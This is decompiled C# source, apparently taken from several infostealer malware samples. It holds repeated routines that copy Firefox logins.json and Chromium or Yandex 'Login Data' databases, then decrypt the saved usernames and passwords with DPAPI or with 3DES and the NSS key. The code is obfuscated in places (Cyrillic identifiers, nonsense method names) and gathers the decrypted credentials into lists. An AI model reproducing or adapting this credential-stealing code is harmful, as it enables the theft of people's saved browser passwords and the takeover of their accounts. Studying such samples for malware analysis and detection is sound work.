// Token: 0x06000CC6 RID: 3270 RVA: 0x000285A4 File Offset: 0x000267A4 public List <BrowserCredendtial> Lopos(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = rcvr.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"])) { JsonValue jsonValue = (JsonValue)obj; нкрпар нкрпар = Апн.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false))); нкрпар нкрпар2 = Апн.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false))); string text = Regex.Replace(шо67г.lTRjlt(privateKey, нкрпар.Objects[0].Objects[1].Objects[1].ObjectData, нкрпар.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(шо67г.lTRjlt(privateKey, нкрпар2.Objects[0].Objects[1].Objects[1].ObjectData, нкрпар2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false)), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception) { } return(list); }
// Token: 0x06000C99 RID: 3225 RVA: 0x0002682C File Offset: 0x00024A2C public List <BrowserCredendtial> GetCredentials(string profilePath) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string text = Path.Combine(profilePath, "Login Data"); if (!File.Exists(text)) { return(list); } CNT cnt = new CNT(rcvr.CreateTempCopy(text)); cnt.ReadTable("logins"); for (int i = 0; i < cnt.RowLength; i++) { BrowserCredendtial browserCredendtial = new BrowserCredendtial(); try { browserCredendtial = this.ReadData(cnt, i); } catch { } if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch { } return(list); }
// Token: 0x06000C9D RID: 3229 RVA: 0x00026C64 File Offset: 0x00024E64 private BrowserCredendtial ReadData(CNT manager, int row) { BrowserCredendtial browserCredendtial = new BrowserCredendtial(); try { browserCredendtial.URL = manager.ParseValue(row, "origin_url").Trim(); browserCredendtial.Login = manager.ParseValue(row, "username_value").Trim(); browserCredendtial.Password = rcvr.DecryptBlob(manager.ParseValue(row, "password_value"), DataProtectionScope.CurrentUser, null).Trim(); } catch { } finally { browserCredendtial.Login = (string.IsNullOrEmpty(browserCredendtial.Login) ? "UNKNOWN" : browserCredendtial.Login); browserCredendtial.Password = (string.IsNullOrEmpty(browserCredendtial.Password) ? "UNKNOWN" : browserCredendtial.Password); browserCredendtial.URL = (string.IsNullOrEmpty(browserCredendtial.URL) ? "UNKNOWN" : browserCredendtial.URL); } return(browserCredendtial); }
// Token: 0x060000B3 RID: 179 RVA: 0x0000598C File Offset: 0x00003B8C public static BrowserCredendtial OldChromeCredential(SQLiteManager manager, int row) { BrowserCredendtial browserCredendtial = new BrowserCredendtial(); try { browserCredendtial.URL = manager.GetValue(row, "origin_url").Trim(); browserCredendtial.Login = manager.GetValue(row, "username_value").Trim(); browserCredendtial.Password = ChromiumManager.DecryptBlob(manager.GetValue(row, "password_value"), DataProtectionScope.CurrentUser, null, false).Trim(); } catch { } finally { browserCredendtial.Login = (string.IsNullOrEmpty(browserCredendtial.Login) ? "UNKNOWN" : browserCredendtial.Login); browserCredendtial.Password = (string.IsNullOrEmpty(browserCredendtial.Password) ? "UNKNOWN" : browserCredendtial.Password); browserCredendtial.URL = (string.IsNullOrEmpty(browserCredendtial.URL) ? "UNKNOWN" : browserCredendtial.URL); } return(browserCredendtial); }
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290 private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>(); Asn1Der asn1Der = new Asn1Der(); foreach (LoginJson loginJson in rootLogin.logins) { Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername)); Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword)); string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception value) { Console.WriteLine(value); } return(list); }
// Token: 0x060000AD RID: 173 RVA: 0x0000550C File Offset: 0x0000370C public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profilePath) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string text = Path.Combine(profilePath, "Ya Login Data"); string text2 = Path.Combine(profilePath, "Login Data"); if (!File.Exists(text) && !File.Exists(text2)) { return(list); } string filePath = (!File.Exists(text)) ? text2 : text; string empty = string.Empty; SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(filePath)); sqliteManager.ReadTable("logins"); for (int i = 0; i < sqliteManager.GetRowCount(); i++) { BrowserCredendtial browserCredendtial = new BrowserCredendtial(); try { browserCredendtial = ChromiumManager.OldChromeCredential(sqliteManager, i); } catch { } if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch { } return(list); }
// Token: 0x0600009C RID: 156 RVA: 0x00006864 File Offset: 0x00004A64 public List <BrowserCredendtial> GetLogins(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = RecoveryHelper.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } GeckoLogin[] logins = File.ReadAllText(path).FromJSON <GeckoRootEntry>().logins; for (int i = 0; i < logins.Length; i++) { GeckoLogin geckoLogin = logins[i]; Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedUsername)); Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedPassword)); string text = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(geckoLogin.hostname) ? "UNKNOWN" : geckoLogin.hostname), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception) { } return(list); }
// Token: 0x060000A6 RID: 166 RVA: 0x00002377 File Offset: 0x00000577 internal bool <GetAll> b__0_1(BrowserCredendtial x) { return(x.IsNotNull <BrowserCredendtial>()); }